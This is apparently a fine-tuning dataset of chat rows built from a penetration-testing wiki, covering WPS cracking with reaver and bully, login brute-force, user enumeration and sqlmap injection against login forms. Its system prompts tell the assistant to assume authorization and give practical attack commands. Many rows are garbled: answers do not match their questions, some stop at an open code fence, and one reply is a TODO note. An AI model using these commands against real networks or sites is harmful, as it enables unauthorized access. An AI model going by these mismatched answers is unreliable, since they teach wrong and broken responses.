\"$CHANNEL\" -vv"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Verbosity of output (for reaver): -v -vv -vvv", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -vv", "metadata": {"corpus_index": 1679, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Verbosity of output: -v 1 -v 2 -v 3"}, {"role": "assistant", "content": "bully \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -S -F -B -v 3\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Verbosity of output: -v 1 -v 2 -v 3", "response": "bully \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -S -F -B -v 3\n```", "metadata": {"corpus_index": 1680, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Verbosity of output: -v 1 -v 2 -v 3"}, {"role": "assistant", "content": "bully \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -S -F -B -v 3\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Verbosity of output: -v 1 -v 2 -v 3", "response": "bully \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -S -F -B -v 3\n```", "metadata": {"corpus_index": 1680, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain WPS - Pixie Dust"}, {"role": "assistant", "content": "In 2014, Dominique Bongard identified a security vulnerability he dubbed \"Pixie Dust\". It specifically targets the default WPS implementation found in wireless chips produced by various manufacturers, including Ralink, MediaTek, Realtek, and Broadcom. The attack exploits a randomization deficiency during the generation of the \"E-S1\" and \"E-S2\" \"secret\" nonces. Knowing these nonces, the PIN can be retrieved in a matter of minutes. \n\nA tool called pixiewps was developed, and a new version of Reaver was created to automate the attack.\n\nCheck this list to know which router model is vulnerable.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain WPS - Pixie Dust", "response": "In 2014, Dominique Bongard identified a security vulnerability he dubbed \"Pixie Dust\". It specifically targets the default WPS implementation found in wireless chips produced by various manufacturers, including Ralink, MediaTek, Realtek, and Broadcom. The attack exploits a randomization deficiency during the generation of the \"E-S1\" and \"E-S2\" \"secret\" nonces. Knowing these nonces, the PIN can be retrieved in a matter of minutes. \n\nA tool called pixiewps was developed, and a new version of Reaver was created to automate the attack.\n\nCheck this list to know which router model is vulnerable.\n\n```bash", "metadata": {"corpus_index": 1681, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WPS - Pixie Dust"}, {"role": "assistant", "content": "In 2014, Dominique Bongard identified a security vulnerability he dubbed \"Pixie Dust\". It specifically targets the default WPS implementation found in wireless chips produced by various manufacturers, including Ralink, MediaTek, Realtek, and Broadcom. The attack exploits a randomization deficiency during the generation of the \"E-S1\" and \"E-S2\" \"secret\" nonces. Knowing these nonces, the PIN can be retrieved in a matter of minutes. \n\nA tool called pixiewps was developed, and a new version of Reaver was created to automate the attack.\n\nCheck this list to know which router model is vulnerable.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WPS - Pixie Dust", "response": "In 2014, Dominique Bongard identified a security vulnerability he dubbed \"Pixie Dust\". It specifically targets the default WPS implementation found in wireless chips produced by various manufacturers, including Ralink, MediaTek, Realtek, and Broadcom. The attack exploits a randomization deficiency during the generation of the \"E-S1\" and \"E-S2\" \"secret\" nonces. Knowing these nonces, the PIN can be retrieved in a matter of minutes. \n\nA tool called pixiewps was developed, and a new version of Reaver was created to automate the attack.\n\nCheck this list to know which router model is vulnerable.\n\n```bash", "metadata": {"corpus_index": 1681, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Verbosity of output (for reaver): -v -vv -vvv in the context of penetration testing"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -K 1 -N -vv"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Verbosity of output (for reaver): -v -vv -vvv in the context of penetration testing", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -K 1 -N -vv", "metadata": {"corpus_index": 1682, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Verbosity of output (for reaver): -v -vv -vvv"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -K 1 -N -vv"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Verbosity of output (for reaver): -v -vv -vvv", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -K 1 -N -vv", "metadata": {"corpus_index": 1682, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WPS - Null Pin work?"}, {"role": "assistant", "content": "Some poorly implemented systems allowed the use of a \"Null\" PIN for connections. Reaver can conduct the attack, whereas Bully lacks this specific functionality.\n\n``bash\nreaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WPS - Null Pin work?", "response": "Some poorly implemented systems allowed the use of a \"Null\" PIN for connections. Reaver can conduct the attack, whereas Bully lacks this specific functionality.\n\n``bash\nreaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''\n``", "metadata": {"corpus_index": 1683, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WPS - Null Pin"}, {"role": "assistant", "content": "Some poorly implemented systems allowed the use of a \"Null\" PIN for connections. Reaver can conduct the attack, whereas Bully lacks this specific functionality.\n\n``bash\nreaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WPS - Null Pin", "response": "Some poorly implemented systems allowed the use of a \"Null\" PIN for connections. Reaver can conduct the attack, whereas Bully lacks this specific functionality.\n\n``bash\nreaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''\n``", "metadata": {"corpus_index": 1683, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the reaver syntax for wps - null pin?"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the reaver syntax for wps - null pin?", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''", "metadata": {"corpus_index": 1684, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "reaver"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WPS - Null Pin"}, {"role": "assistant", "content": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WPS - Null Pin", "response": "reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''", "metadata": {"corpus_index": 1684, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''`?"}, {"role": "assistant", "content": "This command is used for wps - null pin. Null Pin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `reaver -i \"$INTERFACE\" -b \"$BSSID\" -c \"$CHANNEL\" -f -N -g 1 -vv -p ''`?", "response": "This command is used for wps - null pin. Null Pin", "metadata": {"corpus_index": 1684, "category": "linux", "source_file": "docs/src/radio/wi-fi/wps/index.md", "page_title": "WPS", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Wireless keyboard/mouse?"}, {"role": "assistant", "content": "//TODO : attacsks on non-bluetooth wireless keyboard/mouse : mousejacking vulnerabilities class : https://twitter.com/cnotin/status/1163862329940987905"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Wireless keyboard/mouse?", "response": "//TODO : attacsks on non-bluetooth wireless keyboard/mouse : mousejacking vulnerabilities class : https://twitter.com/cnotin/status/1163862329940987905", "metadata": {"corpus_index": 1685, "category": "web", "source_file": "docs/src/radio/wireless-keyboard-mouse.md", "page_title": "Wireless keyboard/mouse", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Wireless keyboard/mouse?"}, {"role": "assistant", "content": "//TODO : attacsks on non-bluetooth wireless keyboard/mouse : mousejacking vulnerabilities class : https://twitter.com/cnotin/status/1163862329940987905"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Wireless keyboard/mouse?", "response": "//TODO : attacsks on non-bluetooth wireless keyboard/mouse : mousejacking vulnerabilities class : https://twitter.com/cnotin/status/1163862329940987905", "metadata": {"corpus_index": 1685, "category": "web", "source_file": "docs/src/radio/wireless-keyboard-mouse.md", "page_title": "Wireless keyboard/mouse", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain 🛠️ Account deletion - Theory"}, {"role": "assistant", "content": "Removing an account is a sensitive action that should be taken into consideration."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain 🛠️ Account deletion - Theory", "response": "Removing an account is a sensitive action that should be taken into consideration.", "metadata": {"corpus_index": 1686, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/account-deletion.md", "page_title": "🛠️ Account deletion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Account deletion - Theory?"}, {"role": "assistant", "content": "Removing an account is a sensitive action that should be taken into consideration."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Account deletion - Theory?", "response": "Removing an account is a sensitive action that should be taken into consideration.", "metadata": {"corpus_index": 1686, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/account-deletion.md", "page_title": "🛠️ Account deletion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Account deletion - Practice"}, {"role": "assistant", "content": "Some protection mechanisms should be incorporated:\n\n1. Protection: when deleting an account, the web application should request the user to submit its credentials (it can prevent attacks such CSRF, XSS...)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Account deletion - Practice", "response": "Some protection mechanisms should be incorporated:\n\n1. Protection: when deleting an account, the web application should request the user to submit its credentials (it can prevent attacks such CSRF, XSS...).", "metadata": {"corpus_index": 1687, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/account-deletion.md", "page_title": "🛠️ Account deletion", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform 🛠️ Account deletion - Practice?"}, {"role": "assistant", "content": "Some protection mechanisms should be incorporated:\n\n1. Protection: when deleting an account, the web application should request the user to submit its credentials (it can prevent attacks such CSRF, XSS...)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform 🛠️ Account deletion - Practice?", "response": "Some protection mechanisms should be incorporated:\n\n1. Protection: when deleting an account, the web application should request the user to submit its credentials (it can prevent attacks such CSRF, XSS...).", "metadata": {"corpus_index": 1687, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/account-deletion.md", "page_title": "🛠️ Account deletion", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Logging in - Theory"}, {"role": "assistant", "content": "link default passwords\n\nAuthentication issues are important to take into consideration. A login page can be the beginning of serious issues regarding accounts takeover.\n\nor bruteforce"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Logging in - Theory", "response": "link default passwords\n\nAuthentication issues are important to take into consideration. A login page can be the beginning of serious issues regarding accounts takeover.\n\nor bruteforce", "metadata": {"corpus_index": 1688, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Logging in - Theory"}, {"role": "assistant", "content": "link default passwords\n\nAuthentication issues are important to take into consideration. A login page can be the beginning of serious issues regarding accounts takeover.\n\nor bruteforce"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Logging in - Theory", "response": "link default passwords\n\nAuthentication issues are important to take into consideration. A login page can be the beginning of serious issues regarding accounts takeover.\n\nor bruteforce", "metadata": {"corpus_index": 1688, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about 🛠️ Logging in - Brute-force"}, {"role": "assistant", "content": "Brute-forcing can have 2 interesting purposes during a pentest engagement:\n\n1. Verifying that the web application implements security measures against brute-forcing.\n2. Taking over an account by guessing its credentials.\n\nOne has to check whether a defense mechanism is used (account locking, blocking IP, CAPTCHA, etc.)\n\n> [!WARNING]\n> Account locking can lead to a denial of service and allow user enumeration. Check the OWASP recommendation on how it should be implemented."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about 🛠️ Logging in - Brute-force", "response": "Brute-forcing can have 2 interesting purposes during a pentest engagement:\n\n1. Verifying that the web application implements security measures against brute-forcing.\n2. Taking over an account by guessing its credentials.\n\nOne has to check whether a defense mechanism is used (account locking, blocking IP, CAPTCHA, etc.)\n\n> [!WARNING]\n> Account locking can lead to a denial of service and allow user enumeration. Check the OWASP recommendation on how it should be implemented.", "metadata": {"corpus_index": 1689, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Logging in - Brute-force"}, {"role": "assistant", "content": "Brute-forcing can have 2 interesting purposes during a pentest engagement:\n\n1. Verifying that the web application implements security measures against brute-forcing.\n2. Taking over an account by guessing its credentials.\n\nOne has to check whether a defense mechanism is used (account locking, blocking IP, CAPTCHA, etc.)\n\n> [!WARNING]\n> Account locking can lead to a denial of service and allow user enumeration. Check the OWASP recommendation on how it should be implemented."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Logging in - Brute-force", "response": "Brute-forcing can have 2 interesting purposes during a pentest engagement:\n\n1. Verifying that the web application implements security measures against brute-forcing.\n2. Taking over an account by guessing its credentials.\n\nOne has to check whether a defense mechanism is used (account locking, blocking IP, CAPTCHA, etc.)\n\n> [!WARNING]\n> Account locking can lead to a denial of service and allow user enumeration. Check the OWASP recommendation on how it should be implemented.", "metadata": {"corpus_index": 1689, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of 🛠️ Logging in - User enumeration"}, {"role": "assistant", "content": "User enumeration can be made possible depending on the:\n\n* Status code (is the status code retrieved, always the same?)\n* Error messages (does the error messages give a hint on whether the account exists?)\n* Response time (is the response time always the same?)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of 🛠️ Logging in - User enumeration", "response": "User enumeration can be made possible depending on the:\n\n* Status code (is the status code retrieved, always the same?)\n* Error messages (does the error messages give a hint on whether the account exists?)\n* Response time (is the response time always the same?)", "metadata": {"corpus_index": 1690, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do 🛠️ Logging in - User enumeration"}, {"role": "assistant", "content": "User enumeration can be made possible depending on the:\n\n* Status code (is the status code retrieved, always the same?)\n* Error messages (does the error messages give a hint on whether the account exists?)\n* Response time (is the response time always the same?)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do 🛠️ Logging in - User enumeration", "response": "User enumeration can be made possible depending on the:\n\n* Status code (is the status code retrieved, always the same?)\n* Error messages (does the error messages give a hint on whether the account exists?)\n* Response time (is the response time always the same?)", "metadata": {"corpus_index": 1690, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does 🛠️ Logging in - JSON Web Tokens (JWS) / OAuth 2.0 work?"}, {"role": "assistant", "content": "Check the following pages for issues regarding JWS and OAuth 2.0."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does 🛠️ Logging in - JSON Web Tokens (JWS) / OAuth 2.0 work?", "response": "Check the following pages for issues regarding JWS and OAuth 2.0.", "metadata": {"corpus_index": 1691, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through 🛠️ Logging in - JSON Web Tokens (JWS) / OAuth 2.0"}, {"role": "assistant", "content": "Check the following pages for issues regarding JWS and OAuth 2.0."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Logging in - JSON Web Tokens (JWS) / OAuth 2.0", "response": "Check the following pages for issues regarding JWS and OAuth 2.0.", "metadata": {"corpus_index": 1691, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about 🛠️ Logging in - SQL injection?"}, {"role": "assistant", "content": "The tool sqlmap can unveil SQL injections on log-in forms.\n\n``\nsqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM\n`\n\n> [!WARNING]\n> Use the --level and --delay` options in pentest engagements to avoid issues (aggressive payloads and denial of service)\n\nFor manual testing: SQL injection (PayloadsAllTheThings)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about 🛠️ Logging in - SQL injection?", "response": "The tool sqlmap can unveil SQL injections on log-in forms.\n\n``\nsqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM\n`\n\n> [!WARNING]\n> Use the --level and --delay` options in pentest engagements to avoid issues (aggressive payloads and denial of service)\n\nFor manual testing: SQL injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1692, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out 🛠️ Logging in - SQL injection during a pentest?"}, {"role": "assistant", "content": "The tool sqlmap can unveil SQL injections on log-in forms.\n\n``\nsqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM\n`\n\n> [!WARNING]\n> Use the --level and --delay` options in pentest engagements to avoid issues (aggressive payloads and denial of service)\n\nFor manual testing: SQL injection (PayloadsAllTheThings)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out 🛠️ Logging in - SQL injection during a pentest?", "response": "The tool sqlmap can unveil SQL injections on log-in forms.\n\n``\nsqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM\n`\n\n> [!WARNING]\n> Use the --level and --delay` options in pentest engagements to avoid issues (aggressive payloads and denial of service)\n\nFor manual testing: SQL injection (PayloadsAllTheThings)", "metadata": {"corpus_index": 1692, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use sqlmap for 🛠️ logging in - sql injection?"}, {"role": "assistant", "content": "sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use sqlmap for 🛠️ logging in - sql injection?", "response": "sqlmap -r $REQUEST_FILE -p $LOGIN_PARAM,$PWD_PARAM", "metadata": {"corpus_index": 1693, "category": "web", "source_file": "docs/src/web/accounts-and-sessions/logging-in.md", "page_title": "🛠️ Logging in", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sqlmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is 